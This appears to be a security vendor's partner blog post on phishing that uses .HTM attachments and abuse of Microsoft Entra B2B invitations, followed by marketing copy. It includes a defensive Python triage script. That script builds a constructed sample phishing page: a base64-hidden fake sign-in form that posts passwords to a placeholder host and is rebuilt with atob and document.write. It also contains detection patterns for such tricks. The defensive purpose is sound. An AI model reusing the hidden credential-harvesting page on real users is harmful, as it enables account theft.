Cyber attackers are increasingly leveraging .HTM files and Microsoft’s own Entra B2B collaboration features to execute stealthy phishing campaigns. These attacks mimic service renewals, payment notices, or guest invitations — and they’re designed to pass through Microsoft’s own defences.
How it Works
- .HTM Files: The email carries a .htm attachment disguised as a trusted document, such as a payment or renewal notice. Because the file is HTML, opening it renders a page directly in the local browser: a fake Microsoft login form built to harvest credentials, or a page that initiates a silent malware installation.
- Microsoft Entra: Cybercriminals spin up rogue Microsoft 365 tenants and abuse Microsoft's Entra B2B collaboration feature to send guest invitations that are, technically, completely legitimate. The invitation text typically carries a renewal or payment notification with an urgent call to action. The messages are delivered from trusted Microsoft domains and IP addresses, but the intent behind them is anything but trustworthy.
- Trusted Microsoft Infrastructure: The emails are sent from Microsoft's own invites@microsoft.com address, so they pass SPF, DKIM and DMARC checks (the authentication results are genuine; it is the tenant behind the invitation that is rogue), and they link to legitimate Microsoft services such as myapplications.microsoft.com.
“Adversaries are leveraging advanced obfuscation techniques in client-side JavaScript to enable polymorphic and fileless payload deployment, including but not limited to ransomware and remote access trojans (RATs).
By dynamically reconstructing malicious code at runtime and embedding phishing assets within local file structures (e.g., MHTML or SVG containers), attackers bypass static and signature-based detection mechanisms.
These tactics reduce dependency on external C2 infrastructure, instead exploiting in-browser execution contexts (e.g., via DOM-based injection, sandbox evasion, or JavaScript-based content spoofing) to deliver malicious functionality while maintaining operational stealth.”
— Anwar Ibrahim, CTO, MailGuard
Key Points for Partners
- .HTM phishing attachments lead to fake Microsoft login pages that harvest user credentials.
- Entra-based scams send real invitations from Microsoft’s infrastructure, adding dangerous credibility.
- The payloads may be linkless, malware-free, and contextually intelligent — making them difficult to detect using traditional filters.
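The following is an added example written for this page; it is not MailGuard's code or any product's detection logic. It shows the triage a defender can run on both lure types described above: extract a .htm attachment and scan it for a fake login page that is reconstructed at runtime (decoding any embedded base64 blob and rescanning it, so the password field and the off-Microsoft form action hidden inside it are still found), and, for a message that genuinely comes from invites@microsoft.com and passes SPF, DKIM and DMARC, flag the content-level tells (a callback phone number and billing or refund language) that authentication alone cannot catch. The two sample messages, the example.invalid hosts, the phone number and the build_*/triage/scan_html function names are constructed for the demonstration.

```python
"""Triage of .HTM phishing attachments and Entra B2B invite lures.

Added example for this page, not MailGuard code. Both sample messages are
constructed; example.invalid hosts and the phone number are placeholders.
"""
import base64
import binascii
import email
import re
from email import policy, utils
from email.message import EmailMessage

# --- constructed sample 1: .htm attachment that rebuilds a fake sign-in page at runtime ---
# The credential form only exists as a base64 string until the script runs in the browser,
# so a scanner that reads the raw file never sees a password field or a form action.
FAKE_LOGIN = (b'<form action="https://example.invalid/collect" method="post">'
              b'<input name="loginfmt"><input type="password" name="passwd"></form>')
HTM_BODY = ("<html><body><script>var p='" + base64.b64encode(FAKE_LOGIN).decode()
            + "';document.write(atob(p));</script></body></html>")


def build_htm_sample() -> bytes:
    msg = EmailMessage()
    msg["From"] = '"Microsoft 365 Support" <billing@example.invalid>'
    msg["To"] = "user@example.invalid"
    msg["Subject"] = "Your subscription has expired"
    msg.set_content("Please open the attached renewal notice.")
    msg.add_attachment(HTM_BODY.encode(), maintype="text", subtype="html",
                       filename="Renewal_Notice.htm")
    return msg.as_bytes()


# --- constructed sample 2: genuine Entra guest invitation carrying a refund/vishing lure ---
def build_invite_sample() -> bytes:
    msg = EmailMessage()
    msg["From"] = "Microsoft Invitations <invites@microsoft.com>"
    msg["To"] = "user@example.invalid"
    msg["Subject"] = "You're invited to access applications"
    msg["Authentication-Results"] = ("spf=pass smtp.mailfrom=microsoft.com; "
                                     "dkim=pass header.d=microsoft.com; dmarc=pass")
    msg.set_content("Your Microsoft 365 subscription renewal of $499.00 is confirmed.\n"
                    "To request a refund call +1 (800) 555-0100.\n"
                    "Accept invitation: https://myapplications.microsoft.com/\n")
    return msg.as_bytes()


MS_HOSTS = ("microsoft.com", "microsoftonline.com", "live.com", "office.com")
INDICATORS = {
    # JavaScript that turns a string into markup or code at runtime (case-sensitive on purpose)
    "runtime-reconstruction": re.compile(r"\b(?:atob|unescape|eval)\s*\(|fromCharCode"),
    "dom-injection": re.compile(r"document\.write|\.innerHTML\s*=", re.I),
    "password-field": re.compile(r"type\s*=\s*[\"']?password", re.I),
}
FORM_ACTION = re.compile(r"action\s*=\s*[\"']?https?://([^\"'/\s]+)", re.I)
B64_BLOB = re.compile(r"[\"']([A-Za-z0-9+/]{40,}={0,2})[\"']")
PHONE = re.compile(r"\+?\d[\d\s().-]{8,}\d")
LURE = re.compile(r"\b(?:renewal|refund|payment|subscription|invoice)\b", re.I)


def off_microsoft_host(host: str) -> bool:
    """True when a form posts anywhere other than a Microsoft sign-in domain."""
    host = host.lower()
    return not any(host == h or host.endswith("." + h) for h in MS_HOSTS)


def scan_html(html: str, depth: int = 0) -> set:
    """Indicators in an HTML string. Base64 blobs are decoded and rescanned (two levels)
    so a form that only exists after atob()/document.write is still found."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(html)}
    if any(off_microsoft_host(h) for h in FORM_ACTION.findall(html)):
        hits.add("off-domain-form")
    if depth < 2:
        for blob in B64_BLOB.findall(html):
            try:
                decoded = base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
            except (binascii.Error, ValueError):
                continue
            hits |= {"decoded:" + h for h in scan_html(decoded, depth + 1)}
    return hits


def triage(raw: bytes) -> dict:
    """Indicators for one raw RFC 5322 message; a dict for analysts, not a verdict."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    result = {"htm_attachments": {}, "entra_invite_lure": []}
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if name.lower().endswith((".htm", ".html")):
            html = part.get_payload(decode=True).decode("utf-8", "ignore")
            result["htm_attachments"][name] = sorted(scan_html(html))
    sender = utils.parseaddr(str(msg.get("From", "")))[1].lower()
    if sender == "invites@microsoft.com":
        auth = str(msg.get("Authentication-Results", ""))
        if all(m + "=pass" in auth for m in ("spf", "dkim", "dmarc")):
            # Real Microsoft infrastructure: authentication is expected to pass and
            # says nothing about the tenant that sent the invitation.
            result["entra_invite_lure"].append("auth-pass")
        body = msg.get_body(preferencelist=("plain", "html"))
        text = body.get_content() if body else ""
        if PHONE.search(text):
            result["entra_invite_lure"].append("callback-number")
        if LURE.search(text):
            result["entra_invite_lure"].append("billing-lure")
    return result


if __name__ == "__main__":
    for sample in (build_htm_sample(), build_invite_sample()):
        print(triage(sample))
```

Run as a script it prints the findings for both constructed samples; triage() accepts any raw message bytes, such as the contents of an .eml file. The auth-pass indicator is deliberately informational: for an Entra invitation the authentication headers are expected to pass, so the useful signal is the callback number and billing language in the body, not the sender.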
Here’s What It Looks Like
This is a seemingly innocuous email claiming that your subscription has expired. The sender name is crafted to spoof Microsoft 365 Support, inspiring confidence that it is a legitimate email from a trusted sender.
Clicking the attachment launches a phishing sequence which replicates the Microsoft sign-in process, in an attempt to steal the user’s Microsoft credentials.
This example impersonates an Account Officer from an export business, asking the recipient to confirm their bank account details before a payment can be processed.
To view the "document", the victim must first enter a username and password, which are captured by the attacker.
Here is an Entra example from invites@microsoft.com. It includes templated text claiming to confirm a Microsoft 365 subscription renewal, but the real call to action is a phone number offering a refund, where the cybercriminals run a vishing (voice phishing) attack. Callers reach a fake PayPal support line where attackers harvest login credentials, multi-factor authentication codes, and personal or financial information. If the recipient accepts the Microsoft guest invitation, their account becomes a guest user in the attacker's rogue tenant. From there, attackers can auto-register malicious applications, harvest OAuth tokens, and access or exfiltrate data via legitimate collaboration paths.
This second Entra example uses the same tactic, with a different tenant and callback number.
Advice to Share with Clients
Train users to be cautious with all file types, especially unexpected .HTM attachments. Encourage leadership to ask: “What is our current time-to-detect on phishing that bypasses Microsoft?” Speed matters.
Want to learn more or arm your team with the latest insights?
Reach out to your MailGuard Partner Manager today or contact expert@mailguard.com.au.
Your expertise, combined with MailGuard’s leading-edge technologies, gives your clients a decisive advantage.
🚀 Let’s build the future of cyber resilience together.
Keeping Businesses Safe and Secure
Prevention is always better than cure, and one of the best defences is to encourage businesses to proactively raise their cyber resilience so that threats never land in inboxes in the first place. With a staggering 94% of malware attacks delivered by email, email is an extremely important vector for businesses to fortify.
No one vendor can stop all email threats, so it’s crucial to remind customers that if they are using Microsoft 365 or Google Workspace, they should also have a third-party email security specialist in place to mitigate their risk. For example, using a specialist third-party cloud email solution like MailGuard.
For a few dollars per staff member per month, businesses are protected by MailGuard's specialist zero-day email security: Special Ops for when speed matters. Our real-time zero-day email threat detection amplifies your clients' intelligence, knowledge, security and defence.
MailGuard provides a range of solutions to keep businesses safe, from email filtering to email continuity and archiving solutions. Speak to your clients today to ensure they're prepared, and get in touch with our team to discuss fortifying your clients' cyber resilience.
Talk to us
MailGuard's partner blog is a forum to share information; we want it to be a dialogue. Reach out to us and tell us what your customers need so we can serve you better. You can connect with us on social media or call us and speak to one of our consultants.
Australian partners, please call us on 1300 30 65 10
US partners call 1888 848 2822
UK partners call 0 800 404 8993